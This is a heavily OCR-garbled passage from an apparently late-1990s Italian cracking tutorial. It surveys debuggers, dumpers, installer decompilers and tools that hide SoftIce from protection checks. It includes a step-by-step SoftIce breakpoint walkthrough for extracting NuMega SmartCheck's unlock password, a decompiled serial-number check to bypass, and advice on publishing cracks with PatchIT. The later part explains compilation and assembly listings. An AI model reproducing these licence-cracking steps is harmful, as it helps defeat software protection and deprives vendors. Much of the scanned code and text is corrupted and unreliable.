ThreadlD FFCAF2E3 ThreadHandle CO000NAO EAX 0041F16E CFO 
EBX 00560000 PFO 
(== =BS 
A s H Ch i DONEITI CAFE si ESI 81624EA8 SF1 
s EDI 00000000 TFO 
PUSH 004253F8 10041F1 73 68F8534200 EBP 0057FF78 IF1 
PUSH 00421404 :0041F178 6804144200 ESP 0057FE3C DF0 
FS:MOV E#%, [00000000] :0041F17D 644100000000 EIP.0041F16E OF1 
PUSH EAX :0041F153 50 CS 0177 NT O 
FS:MOY [00000000], ESP :0041F184 64892500000000 DS D17F VM O 
SUB ESP, +58 :0041F188 83EC58 ES 017F RF O 
PUSH EBX :0041F18E 53 SS 017F IDO 
PUSH ESI :0041F18F 56 ESSSAFE 
PUSH EDI :0041F190 57 GS 0000 
MOY [EBP-18]), ESP :0041F191 8965E8 
CALL [004250C0] ;-* Getversion | :0041F194 FF15C0504200 


AS I >0057FE3C BFF8B537 


Cool debugger è un programma simpatico molto compatto che contiene al suo 
interno tutte le utility necessarie a partire dal debugger, al dump hex, al 
visualizzatore di informazioni tipo ScanBin. 

Diciamo che si tratta di un tutto in uno. 

Permette di eseguire lo step by step come i fratelli più grandi trattandosi di 
un vero e proprio debugger e non solo di un disassemblatore. 

Le caratteristiche dell’ultima versione dichiarate dall’autore sono 


Features in v1.2 

1. Unassembly upto MMX/P6 opcode 

2. Assembly upto Pentium opcode 

Sgrena FPU opcode, do you really need it? tell me.) 
Hook all imported functions (like system dll call) that are called APIs 
All hooked APIs are counted when called. 


4. MultiThread enabled 
5. Emulation - Automatic trace through the debugee until a breakpoint is met. 
6. Log the API call history 
7. when a value is needed, an expression can be used. (like eax + ebx, 
[ecx + 3] + ebx) 
8. Delphi 3.0 object structure recognizing(only for registered user) 
9. more ... ? If you ask for more, let me know. :) 


Per le dimensioni che possiede COOLDB devo ammettere che svolge le sue funzioni 
molto meglio di altri pacchetti che a prima vista sembrerebbero più 
professionali. 

Alcune volte i pacchetti di classe superiore creano dei problemi. 

Ad esempio le ultime versioni della protezione VBOX se riescono a intercettare 
SoftIce escono senza tante storie. 

In altre parole usare SoftIce diventa complesso. 

CoolDb riesce in questo caso a non fare accorgere il sistema di protezione che 
esiste un debugger caricato. 

DEWIN è invece un programma che riesce a fare il dump di un programma Windows 
scrivendolo su file. 

Il programma viene fornito con tanto di sorgenti. 


0040106E: cmp w ecx,03 

00401071: jnz 004010B9 

00401073: xor esi,esi 

00401075: cmp eax,esi 

00401077: jz 00401085 

00401079: mov eax,[0042DDCC] 

0040107E: push eax 

0040107F: call [0042511C] ; --> GlobalFree 
00401085: push ebx 

00401086: mov [0042DDCC], esi 

0040108C: call [00425120] ; --> GlobalDeleteAtom 
00401092: cmp [00428678],esi 

00401098: jz 004010C8 

0040109A: mov ecx,[0042BE4C] 

004010A0: mov edx,[0042A574] 

004010A6: push esi 

004010A7: push ecx 

004010A8: push 03E1 

004010AD: push edx 

004010AE: call [004252E8] ; --> PostMessageA 
004010B4: pop esi 

004010B5: pop  ebx 

004010B6: retn 000C ; disk offset 10B9h 


Il precedente è un piccolo pezzo di dump eseguito con DEWIN dal quale è 
possibile vedere l’accuratezza abbastanza buona che mantiene segnalando a fianco 
ad ogni call di quale funzione API si tratta. 


Come dicevamo prima alcuni file per installarsi richiedono il codice in fase di 
SETUP. 

Per poter riuscire ad entrare si deve decompilare anche i vari files creati da 
INSTALL SHIELD, WISE ecc. 

I seguenti files sono decompilatori di questi programmi di setup. 


Windows.Installshield.Decompiler.V1.00.Beta 
[NaTZGUL/SiraX Production '98 ] 


Il pacchetto si compone dei seguenti files 


wisdec.exe - Windows Installshield Decompiler V1.00 Beta Main Exe File 
wisdec.hlp - Windows Installshield Decompiler V1.00 Beta Help File 
wdtut1.htm - Windows Installshield Decompiler V1.00 Beta Tutorial #1 
isdecomp.htm - NaTzGUL's Windows Installshield Script Cracking Tutorial 
file _id.diz - Program Description 

filelist.txt - File Listing 


L'’help è molto corposo e ben fatto. 

Il programma è portentoso in quanto riesce a ricostruire lo script che ha creato 
il setup. 

Date un occhiata a che bel “INVALID SERIAL NUMBER’ dentro alla seguente 
immagine. 


3 Setup.ins - Windows InstaliShield Decompiler 
File Edit porse Misc Help 


ell SG] al 4 finvalia — — si] Msgre| strreg] 


GGGGIEHLA: 0013 StrUar[9801F] = StrVar[68601C] 2 
09001E52: 69613 StrUar[699280] = StrUar[6861D] A 
GGGG1E6D: 60128 IF {Call Function _9969 [LABEL 962C] = 99990000) THEN 
GGGGIEA7: 6128 IF {StrCompare {StrUar[981E], EVALUATION") ?= 66 
G8G01EC7: 69013 StrLocal[8963] = "INUALID SERIAL NUMBER? If 
09001F39: 0021 NumLocal[ 99602] = FFFF 8861 
608901F43: 862A MessageBox {StrLocal[8993],NumLocal[98992]) 
09001F4B: 69613 StrUar[9921] = StrUar[G01E] sf 
Li 


! (Ready... 4 


Beh. 
Dopo questo è sufficente ricompilare con INSTALL SHIELD e vai 
Magari non è sempre cosi semplice ma comunque il programma è una gran cosa. 


Per quanto riguarda invece i files creati dal setup WISE abbiamo 
exwise v0.5 

(c) 1998 Andrew de Quincey 

http://www.tardis.ed.ac.uk/-adq 

adq@tardis.ed.ac.uk 

Il programma è fornito con tanto di sorgenti. 

Programmi particolari adatti all'analisi di file .EXE sono 

[pb] EXESCAN v3.21 [b] 

The Executables' Analyzer 

Copyright (C) 1997-98 by ST!LLSON 


Features: 
* Designed for unpacking especially 


* Identifies almost any EXE/COM 
packer, crypter, protector and 
the most famous compilers 

* MZ/LE/LX/NE/PE headers recogizing 

* Win32 executables analyzing 

* DeepScan mode (detects more than 

one item at once) 

Generic detection 

TEU unpacker support 

Built-in disassembler 

The most powerful EXE-analyzer 

available today! 

* Freeware. Personal registration! 


* * * * 


[dOS/WIN aNALYZERS]AA[December, 1998] 


Quando mparlavamo di SoftIce dicevamo che molti programmi tentano di 
intercettarlo. 
FrogICE permette di nascondere Softice. 


FrogsICE is a VxD (Virtual device driver for Windows, just like a good old TSR 
for DOS). 

It allows you to intercept programs (exe or COM, DOS/Win16 or Win32) which would 
try to 

detect if SoftICE is loaded. It is particularly useful for packed/encrypted 
programs. 


FrogsICE runs ONLY on Win95/98 OS. 
Dove trovarlo ? 


+Frog's 
www.thepentagon.com/frog_s_print 


Sempre nel campo di SoftIce troviamo Icedump di cui vi riporto integralmente il 
file .IDZ 


ICEDUMP beta 5 build 15 
1999-09-15 
Dumper for Softice for Win9x. 


- Implemented as an internal Winice 
command (PAGEIN). 


- Subcommands: 


dump memory to file 

load file into memory 

dump via Bhrama/Procdump 

dump winice screen to file (ascii/html) 
suspend/resume thread/process 

set page table entry flags 

change FPU registers 

dynamic update of PAGEIN patch 
start/stop playing tracks on CD 

print usage info ;-) 


- Simple anti debugger detection code: 
Int1/Int3/Int4/Int5 IDT entries will 
be changed so that simple offset 
compares would no longer detect winice. 


- Parser accepts expressions whereever 
possible. 


- Supports V86, ring-3/16, ring-3/32 
and ring-0/32 protected mode clients 
whenever possible. 


- No restrictions for size of memory 
block and path/name of dump file. 


- Fool-proof internal parser and 
dumper (but do RTFM ;-). 


- Sources are included, now you can 
even modify them to your liking. 


Precedentemente, parlando di REGSNIF o di quelle utilities che creavano dei DUMP 
di sistema per controllare le modifiche fatte da un programma installato, avevo 
detto che poteva essere utile conoscere quali chiavi venivano aggiunte al file 
di registro, quali files venivano inseriti nel file system. 

Bene. 

INWATCH è un utility che controlla il sistema durante l’isntallazione di 
programmi. 

Questo programma è inoltre in grado di eseguire dei backup dei files prima 
dell’installazione. 


sì Inwatch (LO 


File Edit Search Configfiles Register Tools Window Help 


DIS 


| LAST BACKUP IN:FACRACKTOOLN\NSTALLWY AT 07:41 3 JUN 1997 


Successivamente è possibile eseguire dei confronti o al limite restorare la 
situazione. 


Un utility piccola ma 

carina è SPY Windows che 

s | (2) Gh Ai a permette di intercettare i 
x messaggi diretti ad una 

certa finestra. 

E’ inoltre possibile 


E ; î | inviarli. 
ii =] TORRI zJ $ Il solito mirino 
Enabled: | "] © State: "] a spostabile sulla finestra 


Send M == = == - SEA desiderata permette di 
tura selezionare quale handle 
HWND MSG \WPARAM LPARAM 


CE Spy Window 


EE [o EGP 


Main | General | Styles | Class | Process. Misc | 


utilizzare. 
fo N “] fo [o Il programma ricorda le 
IT HWND_BROADCAST utilites di Microsoft. | 
2 LRESULT | Spy Windows diventa utile 


per vedere, prima di usare 
qualche breakpoint sui 
messaggi, quali messaggi 


Exit | sono generati da una certa 
finestra. 


= pel 


Il prgramma lo trovate a 


Spy & Capure Version 2.70 
Kobi Krichmar 

E-Mail: krichmar@hotmail.com 
Web Site: http:come.to/kobik 


La parte terminale, dopo aver trovato i punti da modificare, della fase di 
debugging è quella relativa alla creazione delle patch. 

Chiramente io la metto sotto forma di patch create per sproteggere qualche 
software anche se le patch possono essere anche quelle che vengono create per 
porre rimedio a problemi di programmi commercializzati. 

Comunque sia l’origine della patch il programma migliore è PtachIT. 


2 Patch It 97 - [untitled1] _ [Dx 


A File Edit Patchfiles Code Tools Window Help -18|x| 


[ Proiect ff 4 © |fyichiles EI fi = |code MMM | 
| Messages | 


[Souce __——|Patches_  |Tempate [Status ________ | 


| 4 


Il programma permette di creare un lista dei file a cui applicare le patch e 
permette anche di creare dei messaggi da visualizzare durante l'esecuzione di 
queste. 

Se per caso trovate il modo di crackare un file e volete pubblicare la vostra 
modifica potete usare PatchIT per crearla e renderla indipendente. 


Un altra utility simpatica è EXESCAN la quale permette di analizzare dei files 
eseguibili e di identificare quali sono stati i compilatori che lo hanno 
prodotto. 

EXESCAN è inoltre in grado di identificare i protettori, i patchers e i packers. 
I formati riconosciuti sono 


compilers: 

Borland C Symantec C 

Borland Pascal PowerBASIC 

Watcom C Zortech C 

TMT Pascal QuickBASIC 

Microsoft C Turbo Basic 

GNU C PL/I-86 
packers/protectors: 

Alec v1.6 Protect! EXE/COM v6.0 


ProtEXE v3.10/v3.11 CrackStop v1.0b-v1.03 


PCrypt v3.50 
HackStop v1.18 
Ciphator Pro v4.6 
EXE Manager v3.0 
Secure v0.19 

Xorer v2.0 

NoDebug v1.0 

RCC II/286 v1.14 
Crypt/Dismember v1.7 
Anti-TEU v0.9 

XPack v1.65-v1.67 
PGMPack v0.13 

DOP''s CRYPTEXE v1.04 
PSP''s EXE2COM v2.0 


E questa è solo una lista parziale dei formati riconosciuti. 
Un programma strano ma carino è CUSTOMIZER. 


www.ozemail.com.au/-wanga 
Wanga International 

PO. Box 64 

Carlton North 3054 
Victoria 

Australia 

Fax +613 93804419 


Il programma è una potente utility che permette di interagire e manipolare tutte 
le windows sulla macchina. 

Le finestre, o dialog, scroll bars, pulsanti ecc. possono essere controllate 
direttamente da CUSTOMIZER. 

Ogni modifica può essere salvata in modo permanente. 

I lavori che possono essere fatti sono 


e Cambiare il testo di ogni oggetto. 

e Abilitare o disabilitare qualsiasi oggetto 
e Muovere il controllo nella finestra 

e Interagire con altre applicazoni. 

e Determinare password nascoste. 

e Trovare oggetti nascosti 


The Customiser Configuration Screen LI fx! 


Window Details | Size and Position | Test | Misc. | API Message | 


© Enable © Show 
È 2 Pr 
©. Disable © Hide SACRO 2 | 


Press 'On' and select a window to edit when in 'Select Mode". 
Use the right mouse button to bring up the Configuration menu. 


Class: [Toolbarwindow32 
Text: | 


Parent Class: [ReBaiWindow32 


Parent Text: 


Handle: 0x0830 Top: 246 
(630,347) Id 40960 Left 366 


Annulla | 


Sppiica 


SMARTCHECK by NUMEGA 


Avevamo inizialmente parlato di SMART CHECK il quale, anche se indirizzato a 
Visual Basic, permette di monitorare un programma al fine di ricercare errori e 
disfunzioni ma anche semplicemente per controllare le funzioni API richiamate. 
E’ possibile reperire la versione sprotetta della versione ed in ogni caso è 
semplice cercare di eliminare la protezione presente nella 5.0 facendolo con il 
suo fratellino SoftIce. 


Per farlo è sufficiente inserire un breakpoint cercando di intercettare 
GetWindowText con 
bpx GetWindowText 


Il programma si interromperà su 


CALL USER!GETWINDOWTEXT 


LEA AX, [BP-32] 


in ax l’indirizzo di quanto avete inserito 


PUSH SS j Il segmento 

PUSH AX ; offset 

PUSH DS 7 Il segmento della password reale 
PUSH 06BA ; il suo offset 

CALL USER!LSTRCMP ; Le compara 


Ora per vedere la password facciamo un DUMP dell’indirizzo DS:06BA 


d ds:06ba 1 64 


Ora dovreste avere la password, e invece avremo &Smc50-14d% dinanzi agli occhi. 
Installiamo il programma normalmente e riattiviamolo lanciando un programma a 32 


bits. 


Compare la maschera in cui viene richiesto l’unlock code. 
Andiamo nuovamente nel debugger e attiviamo nuovamente il breakpoint. 
Ci fermeremo su 


ADD ESP, 
LEA ECX, 


04 LEA EAX, [EBP-14] 
[EBP-28] 


PUSH EAX 
PUSH ECX 
CALL 10005680 


Digitando 


d ecx 1 


64 


avremo i 16 bytes del codice. 


; Vostra password 
; La password corretta 


© NuMega SmartCheck - [LALNNCHkaos.exe - Program Results] 
E File Edit Yiew Program Window Help 


BEE 


es 


For Help. press F1 


Double (112.93) --> Single (112.93) 

Left$ 

UCase$ 

GetDriveTypeà retums UINT:3 

Timer returns double:98.26 [displayed as single-precision floating point) 
Double (98.26) --> Single (98.26) 

Double (112.93) --> Single (112.93) 

Timer returms double:98.26 (displayed as single-precision floating point] 
Timer retums double:98.26 [displayed as single-precision floating point) 
Double (98.26) --> Single (98.26) 

Double (113.26) --> Single (113.26) 


Left$ hd 


[RUN [Program Events: 372364 


Ritorniamo a SmartCheck come 
programma. 

Bisogna sottolineare che la sua 
specializzazione è relativa a 
VisualBasic come per tanti altri 
programmi di NuMega (FailSafe, 
BoundChecker ecc.) 

In pratica SmartCheck svolge una 
funzione di Spy un pò più 
specializzata per i programmi 
VB. 

Proprio per la sua 
caratteristica di avere delle 
DLL che costituiscono il run 
time di VB spesso si incontrano 
difficoltà a debuggare programmi 
scritti con questo linguaggio. 
SmartCheck costituisce un valido 
aiuto per questi casi. 


Decafe Pro 


Java Decompiler for Windows 95/98/NT 
Home page: http://decafe.hypermart.net 
Email: decafe@home.com 


Si tratta di un ottimo Java Decompiler in ambiente Windows (al contrario di JAD 
che è per ambiente DOS). 

Semplicemente selezionando un file .class viene decompilato nel suo .java 

La versione che si trova in giro non ha funzioni di salvataggio, drag’n’drop 
attive. 


Per attivarle è sufficiente collegarsi al suo sito tramite funzioni interne al 
programma. 


Decafe - Java Decompiler - [JDesignerPro] ([0]x] 
E File Edit View Window Help. Tool =18/x| 


|èB6|sif-@ <oeelAg ali 
$ checkSetup(String (a static String serverSeparator = "\ 
È getSystem(String s static String dateFormat = "mm/dd/4 
È loadExpiredMessa( int daysRemaining; 
È initusertinti) static int sysFontSize = ll; 
handleEvent(Event Runtime r; 
JDesignerProî int counter; 
JDesignerPro(Strin 
JDesignerPro(Strin 


public JDesignerPro(}) 


JDesignerPro(Strin I 

main(String aras[) IDPDirectory = "" 
inito maxprocess = 20; 
run IniContents = ""; 


stopò 
P displayiessage(JE 
® ocò 
® getDaysRemaining 
? getunixDaysRemai® ‘ 
Ready {Ln 1, Col1 [ [MAC [ [ % 


} 


public JDesignerPro(String s, Strir 
” 


Sempre nell'ottica che a volte il problema è relativo al fatto di reperire più 
informazioni possibili esistino infinità di utility. 

Una di queste è APIS 32 che permette di analizzare le funzioni che un programma 
richiama. 

APIS 32 permette di aggiungere nella Windows principale le funzioni che si 
desidera tenere sotto controllo. 


$GAPIS32 v. 2.4 - UNREGISTERED =(clxil La scelta viene fatta selezionando 
- Egamining Application | Statue da file forniti con il pacchetto i 
E:\Cia\CrackMe exe Jil] IY/0nToa: I Paso quali contengono le funzioni 


n specifiche di ogni DLL (kernel32, 

Command Line Arguments: ma p i 32 ecc. ) 

(Follow API functions are spied Mandando in esecuzioni il programma 

\PI32 : RegOpenKeyà (HANDLE, LPSTR, LPDATA ) Find è ppossibile vedere quali funzioni 

32: RegOpenkeyExà [ HANDLE, LPSTR, DWORD, DWORD, LPDATA ] l 

ADVAPI32 : RegOpenkKeyExWw [ HANDLE, LPWSTR, DWORD, DWORD, LPDATA ) 83 sono state chimate e a quale punto. 
Succesivamente all'esecuzione è 


ADVAPI32 : RegOpenKeyWw [ HANDLE, LPWSTR, LPDATA ] 
ADVAPI32.DLL : RegQueryInfoKeyà [ void ] 
ADVAPI32 DLL : RegQueryYalueA [ void] 


ADVAPI32 DLL: RegQuerivaluE4h [void] possibile analizzare il file di LOG 
n) che viene creato dal pacchetto. 
TA oso OT] Possono essere ricavate facilmente 
PERNELSE esi ESRI Ori ORO] a | informazioni difficilmente 

KERNEL32: _Iread [ HANDLE, LPDATA, DWORD ] 


D CRE a 
KERNEL32 : write (HANDLE, LPSTR, DWORD ] - individuabili +:9bHro-W0dos>, —. 
KERNEL32 : CreateFileà [LPSTR, DWORD, DWORD, LEDATA, DWORD, DWORD, HANESl| (Del All Il seguente è uno spezzone di file 

dan .-log relativo ad un programma 
era analizzato con APIS 32. 


=======z====== Created by APIS32 vv. 2.4 ====z=zzzzzzzzo= 


0048C427 :GetModuleHandleA(LPSTR:00000000) 

0048C42D:GetModuleHandleA = 400000 

0048C445:GetModuleFileNameA(HANDLE:00400000, LPSTR:00590020:"t",DWORD:000000FF) 
0048C44B:GetModuleFileNameA = 12 

0048CE5F :CreateFileA(LPSTR:00590020:"E:\CIA\CRACKME.EXE",DWORD:80000000, DWORD:00 
000003, LPDATA: 00000000, DWORD:00000003, DWORD:00000080, HANDLE :00000000) 
0048CE65:CreateFileA = C 
0048D617:CreateFileA(LPSTR:006BBA90:"\\.\SHRINK33.LDR",DWORD:00000000, DWORD:0000 
0000, LPDATA: 00000000, DWORD:00000003, DWORD:04000000, HANDLE : 00000000) 


0048D61D:CreateFileA = FFFFFFFF 
0048D6DB:GetWindowsDirectoryA(LPSTR:006BFCAC:"E-C_Ù +w_", DWORD:00000104) 
0048D6E1:GetWindowsDirectoryA = A 

0048CE5F :CreateFileA(LPSTR:006BFCAC:"C:\WINDOWS\000E121.TMP",DWORD:40000000, DWOR 
D:00000000, LPDATA: 00000000, DWORD:00000002, DWORD:00000080, HANDLE : 00000000) 
0048CE65:CreateFileA = 10 

0048CEAF :WriteFile(HANDLE:00000010, LPDATA:006BBBA8, DWORD:00003220, LPDATA : 006BBB7 
4, LPDATA: 00000000) 

0048CEB5:WriteFile = 1 
0048D617:CreateFileA(LPSTR:006BBA90:"\\.\000E121.TMP",DWORD:00000000, DWORD:00000 
000, LPDATA: 00000000, DWORD:00000003, DWORD:04000000, HANDLE : 00000000) 
0048D61D:CreateFileA = 10 
0048D7D5:DeleteFileA(LPSTR:006BFCAC:"C:\WINDOWS\000E121.TMP") 
0048D7DB:DeleteFileA = 1 
0048C637:LoadLibraryA(LPSTR:004646DC:"kernel32.d11") 
0048C63D:LoadLibraryA = BFF70000 
0048C637:LoadLibraryA(LPSTR:0046495C:"user32.d11l") 

0048C63D:LoadLibraryA = BFF50000 
0048C637:LoadLibraryA(LPSTR:00464996:"advapi32.d1l1") 
0048C63D:LoadLibraryA = BFEA0000 
0048C637:LoadLibraryA(LPSTR:004649D6:"oleaut32.d11") 
0048C63D:LoadLibraryA = 65340000 
0048C637:LoadLibraryA(LPSTR:00464A66:"kernel32.d11") 
0048C63D:LoadLibraryA = BFF70000 
0048C637:LoadLibraryA(LPSTR:00464AC8:"advapi32.d11") 
0048C63D:LoadLibraryA = BFEA0000 
0048C637:LoadLibraryA(LPSTR:00464B08:"kernel32.d11") 
0048C63D:LoadLibraryA = BFF70000 
0048C637:LoadLibraryA(LPSTR:00464ECA:"gdi32.d11") 

0048C63D:LoadLibraryA = BFF20000 
0048C637:LoadLibraryA(LPSTR:004653B2:"user32.dl1l") 

0048C63D:LoadLibraryA = BFF50000 
0048C637:LoadLibraryA(LPSTR:00465D66:"ole32.d11") 

0048C63D:LoadLibraryA = 65F00000 
0048C637:LoadLibraryA(LPSTR:00465D7E:"comct132.d11") 
0048C63D:LoadLibraryA = BFB70000 


Ad esempio l’analisi fatta nell’esemmpio precedente è relativa ad un file 
protetto con shrink. 
Dal file di LOG si possono vedere alcune funzioni richimate dal programma. 


0048CE5F :CreateFileA(LPSTR:00590020:"E:\CIA\CRACKME .EXE",....... 
0048D617:CreateFileA(LPSTR:006BBA90:"\\.\SHRINK33.LDR",.... 
0048CE5F :CreateFileA(LPSTR:006BFCAC:"C:\WINDOWS\000E121.TMP",.... 
0048D7D5:DeleteFileA(LPSTR:006BFCAC:"C:\WINDOWS\000E121.TMP").... 


Debuggando il file si incontrano le solite difficoltà legate ai file packati in 
quanto bisognerebbe usare la tecnica dei dumper per riuscire a by-passare il 
problema. 

Da queste istruzioni sembrerebbe che venga creato qualche file contenente le 
istruzioni decodificate con le quali viene creato il file da eseguire. 

Oltre a questo dall’osservazione di tali informazioni potrebbe essere 
semplificata la problematica di individuare le funzioni da utilizzare nei 
breakpoint. 


TRA LIBRERIE E ACTIVEX 


Esistono diversi linguaggi che permettono la programmazione in ambiente Windows 
come ad esempio Visual Basic, Visual C++, Visual Java ecc. 

Java in effetti è un caso particolare in quanto la sua logica è differente da 
quella degli altri linguaggi. 

Ogni linguaggio possiede il suo compilatore od interprete il quale dopo aver 
eseguito un analisi sintattica e semantica traduce il sorgente originario in uno 
eseguibile dalla macchina. 

Java possiede un traduttore in un byte code che viene interpretato da una 
macchina virtuale Java. 

I programmi Java non subiscono una vera e propria compilazione tanto che utility 
come JAD.EXE riescono a rigenerare i sorgenti partendo dai files .CLASS generati 
dal “compilatore”. 

Indipendentemente dalla sintassi del linguaggio molte funzioni vengono gestite 
agganciandosi al sistema delle Api di Windows. 

Tutti conosceranno il concetto di libreria. 

In pratica durante la scrittura del software capita spesso di creare funzioni 
che possiedono la caratteristica di poter essere utilizzate in più di una 
circostanza. 

In questo caso i linguaggi di programmazione, mediante diverse tecnologie, 
permettono la creazione di quelle che vengono definite con il nome di librerie. 
Queste possono essere collegate ai nostri programmi mediante tecniche differenti 
come ad esempio quelle delle librerie statiche che devono essere collegate al 
software in fase di link. 

La creazione di un programma eseguibile si suddivide in diverse fasi. 

La prima fase è quella in cui il compilatore esegue un analisi sintattica e 
semantica del programma segnalandoci eventuali errori. 

Passata questa fase il compilatore passa il testimone al linker il quale svolge 
diverse funzioni. 

La prima è quella di controllare se le funzioni che vengono chiamate sono 
presenti dentro al software. 

In caso negativo inizia a ricercarle dentro alle librerie collegate al programma 
e se non vengono reperite neppure in quel punto allora viene segnalato un errore 
di “Unresolved external” e la creazione del modulo eseguibile viene interrotta. 
Come dicevo prima è possibile specificare che alcune funzioni sono presenti 
dentro ad una libreria statica la quale normalmente possiede come estensione 
.LIB. 

Il compilatore dopo le sue passate crea dei moduli OBJ i quali sono moduli 
binari in cui il codice non è stato rilocato ovvero che dentro al quale i 
riferimenti sono ancora simbolici. 

Quando noi scriviamo un programma creeremo in modo diretto od indiretto dei 
richiami ad indirizzi o per meglio dire a punti del programma che vengono usati 
come riferimenti. 

Potrebbe essere un esempio 


if(valore == 1) 
salta_al punto X; 


altre _istruzioni 


‘punto X 


In questo caso facciamo direttamente riferimento al salto in un punto che nel 
programma in esecuzione sarà ubicato ad un certo indirizzo. 
In linguaggio assemblativo potrebbe essere una cosa del genere 


0030:1234 cmp ax, 1 ; Compara ilcontenuto del registro AX con 1 
0030:1236 je 0030:1239 7 Se uguale salta a 0030:1239 
0030:1238 mov bx, 2 ;j Altre istr. 


0030:1239 NERE j Indirizzo del salto 


In questo caso, come dicevo prima, sono io che richiedo direttamente di saltare 
ad un certo punto che nel programma indico come un simbolo. 

In questo caso io lo chiamo punto Xx ma non ho la più pallida idea na che 
indirizzo di memoria fisico corriponderà al momento dell'esecuzione. 

Esistono costrutti di linguaggi a più alto livello che vengono tradotti dal 
compilatore con all’interno dei riferimenti ad indirizzi. 

Un altro esempio di riferimenti a punti precisi del programma lo è il caso in 
cui ci si riferisce a dei valori che sono salvati in qualche parte della 
memoria. 

In linguaggio C potrebbe essere 


*m_Value = 123; 


oppure in assembler: 


0030:0002 mov [0030:2345], 123 


Nei moduli oggetto i riferimenti sono ancora simbolici e non assoluti come 
avviene dopo il caricamento del programma eseguibile. 

Ci sono costrutti di certi linguaggi che per se stessi non possiedono loops o 
riferimenti ciclici ad indirizzi ma che il compilatore tradurrà facendoglieli 
avere. 

Prendete il caso in cui si abbiano due vettori di 10 elementi ciascuno e che il 
problema sia quello di spostare il contenuto di ogni elemento di uno nel suo 
corrispettivo dell'altro. 

Per risolvere il problema sarebbe necessario un loop del tipo: 


int array_uno[10] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 0 }; 
int array_due[10]; 
int indice; 


for(indice=0;indice!=10;indice++) 
array_due[indice] = array_uno[indice]; 


In linguaggio assemblativo ci saranno controlli mediante cmp o similia e si 
eseguiranno jump (salti) a certi indirizzi a seconda dei casi. 

Esistono costrutti che in linguaggi, come ad esempio il linguaggio C di prima, 
non mostrano caratteristiche di algoritmi in cui le istruzioni non siano altro 
che semplici assegnazioni ma che il compilatore tradurrà a modo dell'esempio di 
prima. 

Questo esempio lo avevo riportato inizialmente ma lo voglio riportare per fare 
una comparazione. 

Prendiamo il programma fatto con il ciclo for. 


int array_uno[10] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 0 }; 
int array_due[10]; 


void copy_array(void) 
{ st. 
int 1; 
for(i=0;1i!=10;i++) 
array_due[i] = array_uno[i]; 


} 


Ora diamo il comando che crea il sorgente assembler. 


Cl /c /Fatest.asm test.c 


Et voilà !! 


TITLE test2.c 
.386P 


include listing.inc 
if @Version gt 510 


.model FLAT 
else 
_TEXT SEGMENT PARA USE32 PUBLIC 'CODE' 
_TEXT ENDS 
_DATA SEGMENT DWORD USE32 PUBLIC 'DATA' 
_DATA ENDS 
CONST SEGMENT DWORD USE32 PUBLIC 'CONST' 
CONST ENDS 
_BSS SEGMENT DWORD USE32 PUBLIC 'BSS' 
_BSS ENDS 
_TLS SEGMENT DWORD USE32 PUBLIC 'TLS' 
_TLS ENDS 
FLAT GROUP _DATA, CONST, _BSS 

ASSUME CS: FLAT, DS: FLAT, SS: 
endif 
PUBLIC _array_uno 


_DATA SEGMENT 


COMM _array_due:DWORD :0aH 
_array_uno DD 01H 
DD 02H 
DD 03H 
DD 04H 
DD 05H 
DD 06H 
DD 07H 
DD 08H 
DD 09H 
DD 00H 
_DATA ENDS 
PUBLIC _Copy_array 
_TEXT SEGMENT 
i$ = -4 


_Copy_array PROC NEAR 
; File test2.c 


FLAT 


; Line 5 
push ebp 
mov ebp, esp 
push ecx 
; Line 7 
mov DWORD PTR _i$[ebp], 0 
jmp SHORT $L28 
$L29: 
mov eax, DWORD PTR _i$[ebp] 
add eax, 1 
mov DWORD PTR _i$[ebp], eax 
$L28: 
cmp DWORD PTR _i$[ebp], 10 
je SHORT $L30 
; Line 8 
mov ecx, DWORD PTR _i$[ebp] 
mov edx, DWORD PTR _i$[ebp] 
mov eax, DWORD PTR _array_uno[edx*4] 
mov —DWORD PTR _array_due[ecx*4], eax 
jmp SHORT $L29 
$L30: 


; Line 9 


l4 


0000000aH 


mov esp, ebp 

pop ebp 

ret (0) 
_Copy_array ENDP 
_TEXT ENDS 
END 


Ora prendiamo il sorgente in cui la copia avviene con l'’aritmetica dei 
puntatori. 


struct X { 
int a[10]; 
}; 


int array_uno[10] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 0 }; 
int array_due[10]; 
void copy_array(void) 


(*((struct X *)&array_due[0])) = (*((struct X *)&array_uno[0])); 


Stesso comando di prima del compilatore ed ecco il sorgente 


TITLE text.c 
.386P 
include listing.inc 
if @Version gt 510 


.model FLAT 
else 
_TEXT SEGMENT PARA USE32 PUBLIC 'CODE' 
_TEXT ENDS 
_DATA SEGMENT DWORD USE32 PUBLIC 'DATA' 
_DATA ENDS 
CONST SEGMENT DWORD USE32 PUBLIC 'CONST' 
CONST ENDS 
_BSS SEGMENT DWORD USE32 PUBLIC 'BSS' 
_BSS ENDS 
_TLS SEGMENT DWORD USE32 PUBLIC 'TLS' 
_TLS ENDS 
FLAT GROUP _DATA, CONST, _BSS 

ASSUME CS: FLAT, DS: FLAT, SS: FLAT 
endif 
PUBLIC _array_uno 


_DATA SEGMENT 
COMM _array_due:DWORD:0aH 


_array_uno DD 01H 
DD 02H 
DD 03H 
DD 04H 
DD 05H 
DD 06H 
DD 07H 
DD 08H 
DD 09H 
DD 00H 
_DATA ENDS 
PUBLIC _Copy_array 


_TEXT SEGMENT 
_Copy_array PROC NEAR 
; File text.c 

; Line 9 


push ebp 
mov ebp, esp 


push esi 
push edi 
; Line 10 
mov ecx, 10 ; 0000000aH 


MOV esi, OFFSET FLAT:_array_uno 
mov edi, OFFSET FLAT:_array_due 


rep movsd 
; Line 11 

pop edi 

pop esi 

pop ebp 

ret (0) 
_Copy_array ENDP 
_TEXT ENDS 


END 


Già a livello di lunghezza il secondo risualta essere di 927 bytes contro i 1174 
del primo. 

Ora mettiamo iun comparazione la perte dell'algoritmo eliminando la parte delle 
dichiarazioni dei segmenti e dei dati. 


_Copy_array PROC NEAR _Copy_array PROC NEAR 
push ebp push ebp 
mov ebp, esp mov ebp, esp 
push esi push ecx 
push edi mov DWORD PTR _i$[ebp], © 
mov ecx, 10 jmp SHORT $L28 
MOV esi, OFFSET FLAT:_array_uno |$L29: 
mov edi, OFFSET FLAT:_array_due mov eax, DWORD PTR _i$[ebp] 
rep movsd add eax, 1 
pop edi mov DWORD PTR _i$[ebp], eax 
pop esi $L28: 
pop ebp cmp DWORD PTR _i$g[ebp], 10 
ret 0 je SHORT $L30 

_Copy_array ENDP mov ecx, DWORD PTR _i$[ebp] 


mov edx, DWORD PTR _i$[ebp] 

mov eax, DWORD PTR 
_array_uno[edx*4] 

mov DWORD PTR 
